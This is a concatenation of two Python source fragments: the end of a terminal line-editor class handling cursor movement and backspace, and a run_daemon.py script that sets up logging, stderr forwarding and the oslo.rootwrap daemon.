    def __iadd__(self, other):
        # insert 'other' at the cursor and advance past it
        text = self.get()
        i = self.cursor_index
        self.set(text[:i] + other + text[i:], cursor_pos = i + len(other))
        return self

    def backspace(self):
        if self.cursor_index == 0:
            return
        text = self.get()
        i = self.cursor_index
        self.set(text[:i - 1] + text[i:], i - 1)

    def del_key(self):
        text = self.get()
        i = self.cursor_index
        if i == len(text):
            return
        self.set(text[:i] + text[i + 1:], i)

    def home_key(self):
        self.cursor_index = 0

    def end_key(self):
        self.cursor_index = len(self.get())

    def invalidate(self):
        """Discard any edits and revert to the read-only text."""
        self.modified = False
        self.w_line = None
        self.cursor_index = len(self.ro_line)

    def go_left(self):
        self.cursor_index = max(0, self.cursor_index - 1)

    def go_right(self):
        self.cursor_index = min(len(self.get()), self.cursor_index + 1)

    def draw(self, buffer):
        # write the text, then enough backspaces to park the terminal cursor
        buffer.write(self.get())
        buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
run_daemon.py | # Copyright (c) 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import sys
import threading
from oslo_rootwrap import cmd
from oslo_rootwrap import subprocess
def forward_stream(fr, to):
    """Copy *fr* into *to* line by line until EOF (an empty read)."""
    while True:
        chunk = fr.readline()
        if not chunk:
            return
        to.write(chunk)
def forwarding_popen(f, old_popen=subprocess.Popen):
    """Return a Popen replacement that also mirrors the child's stderr to *f*.

    The forwarding runs on a daemon thread so it never blocks the caller nor
    keeps the process alive.
    """
    def popen(*args, **kwargs):
        proc = old_popen(*args, **kwargs)
        forwarder = threading.Thread(target=forward_stream, args=(proc.stderr, f))
        forwarder.daemon = True
        forwarder.start()
        return proc
    return popen
class nonclosing(object):
    """Proxy that delegates to a wrapped file object but makes close() a no-op."""

    def __init__(self, f):
        self._f = f

    def __getattr__(self, name):
        # delegate every attribute we do not define ourselves
        return getattr(self._f, name)

    def close(self):
        # intentionally a no-op: the wrapped stream must stay open
        pass
# logging line layout: timestamp | [pid] + level | message
log_format = ("%(asctime)s | [%(process)5s]+%(levelname)5s | "
              "%(message)s")
if __name__ == '__main__':
    # debug-level logging with the pid/level format defined above
    logging.basicConfig(level=logging.DEBUG, format=log_format)
    # wrap stderr so nothing (e.g. logging shutdown) can close the real stream
    sys.stderr = nonclosing(sys.stderr)
    # enter the oslo.rootwrap daemon main loop
    cmd.daemon()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.